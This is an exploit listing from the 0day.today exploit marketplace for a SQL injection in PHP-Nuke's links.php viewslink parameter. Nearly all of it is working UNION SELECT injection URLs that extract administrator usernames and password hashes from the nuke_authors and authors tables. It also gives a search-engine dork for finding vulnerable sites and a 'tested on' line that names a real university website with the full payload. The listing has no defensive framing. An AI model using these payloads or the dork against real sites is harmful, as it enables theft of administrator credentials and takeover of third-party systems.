[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-Nuke viewslink Remote SQL Injection Vulnerability

Author
CMD
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12135
Category
web applications
Date add
05-05-2010
Platform
php
=====================================================
PHP-Nuke viewslink Remote SQL Injection Vulnerability
=====================================================

# Version: [PHP Nuke 5.0 and other version]

# Dork: [allinurl: op=viewslink&sid=]
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=


# Tested on: 
[http://www.eee.deu.edu.tr/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*]


=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=

# Code :

[

Exploit 1: 
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

           
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*



Exploit 2: 
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/authors/**/where/**/radminsuper=1/*

        
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/authors/**/where/**/radminsuper=1/*




#  0day.today [2024-12-24]  #